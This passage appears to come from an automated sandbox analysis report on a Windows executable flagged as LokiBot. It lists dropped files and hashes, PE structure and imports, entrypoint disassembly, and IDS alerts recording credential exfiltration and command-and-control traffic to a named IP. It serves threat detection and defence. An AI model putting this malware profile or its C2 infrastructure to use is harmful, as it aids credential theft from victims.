Preview:	EA06..p..[.r9u..u.I.w[..M$....9..Ct.H.....M .K..)..Et..$`.]....y...K........\|.p.o..t............@../.]%.P...R.%..$.Z.G/..6. .o.@..]@...p.g./..d.P..]@...N.R)........./......r.%.9...c ....Aw.H.......F.3<..\..6...L........x.F....B^.....]. 0...Rk..B...\..5_..D.....5_..\.U...5_....U..`5_..L.U...5\..>2p..H.^.w.Z..G .z.C .....@.......0.G. /Z.H%......j^...u.B.u....$.../.C....d G_T......n`>_.......zG#.....p....@.......@...........`.M..`... ...u...@....'.".].{>K...c.H. ..]$.._..\......>K.#G.t..3\|wY0.G.".]d.8_..Gu..i\|wY....u.h...p........!.H..+....Hd.P;....K.rP.L..7.p.f..+..fd.I\|.. .K.@...f...E...Y.4..3.)%....H@......w)4....P.....2p....<d....,vN........K.!+..'$.....,fC$..WI.......r.$.X..c2...Ip.Y.!...Gd.....,f./.... .#!....c.P......,.\.h.s.....,vJ......t.I...x40......d@...K......4..@.6.-..p..R...$...RP.N...;#.`.../.H.....G.....c.0..\...wx.....v@........E....K.y6....p.c2..."..b.!....F ...@B5u.Ie.........vB......d.[..^...B20....;..X...w.HA.......p..e.....$r....u...

C:\Users\user\AppData\Local\Temp\unspawned

Download File

Process:	C:\Users\user\Desktop\vsf098633534.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.51959111824812
Encrypted:	false
SSDEEP:	1536:s1lGPGEz2DBf+Pi7wxkv2iX78/Y91g/goI/Fe/01eg6BZcjy403Mh7BBQldUNUD0:q0PGpQiXXh7g4oax1eg6eGx3M77CiqD0
MD5:	0C6E82667069C21AE6B40EB7DD06952D
SHA1:	594FEE73ABF6C300A01B64769041E4273CB86306
SHA-256:	EBD2E8A921B1F5C8D94A278052AFEA2D1003214F794AD770D7743B1434184EC8
SHA-512:	56063F694B4CBE225E52DEBA9788F6790E0AC840D38D1089DD3C240E15A225642ECFFB57A65D62365337A6577B48BBBE2C5876164751C5F868A3E75BA8F52BD0
Malicious:	false
Reputation:	low
Preview:	...NGDRJAETI..UZ.C5HRWND.RJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRW.DDRDZ.ZI.X.{.By.s.&-7r:73;.<u9&-['&w,!d ?+e='o...g.Z,7yCINvJEETIOQ..?...D...R...S......U.......D...M...C.zq....X...\..._.....^...S..S......Q..z....R.ww....G... ]..A.DDRJEETI..UZ.B1H._".DRJEETIO.UYFH4DRWvEDR.METIOQ.cFC5XRWN.ERJE.TI_QUZEC5MRVNDDRJ@EUIOQUZGc?HRSNDDRJEGTI.QUJGC%HRWNTDRZEETIOQEZGC5HRWNDDR..DT-OQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5H.VN.DRJEETIOQUZGC5HRWNDDRJEETIO.!??75HR.xEDRZEETqNQU^GC5HRWNDDRJEETiOQ5t5'T<3WN$.RJE.UIO.UZG.4HRWNDDRJEETIO.UZ.mQ)&6NDDv.MET.NQUXGC56SWNDDRJEETIOQU.GC.fWNDDRJEeTIOQ_ZGc5HR.ODDRJEETIOQUZGC5H.WNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETI

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.851506071240427
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vsf098633534.exe
File size:	968'192 bytes
MD5:	cb68430ac5f87fddaf2af8477b82308c
SHA1:	4b86f7f627f7bb989fc02e76dfe687c7d0d5ca91
SHA256:	5eb39af58bc99962a6439d873bda78086903301b0476ef79daf3802220fdf382
SHA512:	0c561291305ef66ee82712dad69d7e3c29eec29937990838bde6938e6db2802d6c8f93c9d54ca2beb22aba6a72dcd894b1dceff40b1593ed52ae5455d7efaafe
SSDEEP:	12288:5u6JWgXT7rKfXNeKgOIc0nAWY/ySWHDVz/Vovh7V1C0NnCGso9fgBDYgaYT8JryW:5u6J33O0c+JY5UZ+XC0kGso6FaglgWY
TLSH:	4325AE2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67B68006 [Thu Feb 20 01:06:14 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE6984D635Ah
jmp 00007FE6984C9124h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE6984C92AAh
cmp edi, eax
jc 00007FE6984C960Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FE6984C92A9h
rep movsb
jmp 00007FE6984C95BCh
cmp ecx, 00000080h
jc 00007FE6984C9474h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE6984C92B0h
bt dword ptr [004BE324h], 01h
jc 00007FE6984C9780h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FE6984C944Dh
test edi, 00000003h
jne 00007FE6984C945Eh
test esi, 00000003h
jne 00007FE6984C943Dh
bt edi, 02h
jnc 00007FE6984C92AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE6984C92B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE6984C9305h
bt esi, 03h
jnc 00007FE6984C9358h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x23dbc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xeb000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x23dbc	0x23e00	55bff7fe4f626786f64f1ca361faab89	False	0.8171480291811847	data	7.586997349910274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xeb000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1b082	data			1.000370296779321
RT_GROUP_ICON	0xea83c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xea8b4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xea8c8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xea8dc	0x14	data	English	Great Britain	1.25
RT_VERSION	0xea8f0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xea9cc	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-20T03:43:14.427531+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50067	TCP
2025-02-20T03:43:14.532930+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:14.532930+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:14.532930+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:15.323418+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:16.479030+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:16.479030+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:16.479030+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:17.388825+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:17.451575+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:17.451575+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:17.451575+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:18.278303+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:18.285091+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49733	TCP
2025-02-20T03:43:19.442017+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:19.442017+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:19.442017+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:20.267191+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:20.272240+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49734	TCP
2025-02-20T03:43:21.771429+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:21.771429+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:21.771429+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:22.574776+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:22.580509+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49735	TCP
2025-02-20T03:43:23.729997+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:23.729997+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:23.729997+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:24.489416+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:25.651126+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:25.651126+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:25.651126+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:26.463190+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:26.470269+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49737	TCP
2025-02-20T03:43:27.752713+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:27.752713+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	104.21.64.1	80	TCP
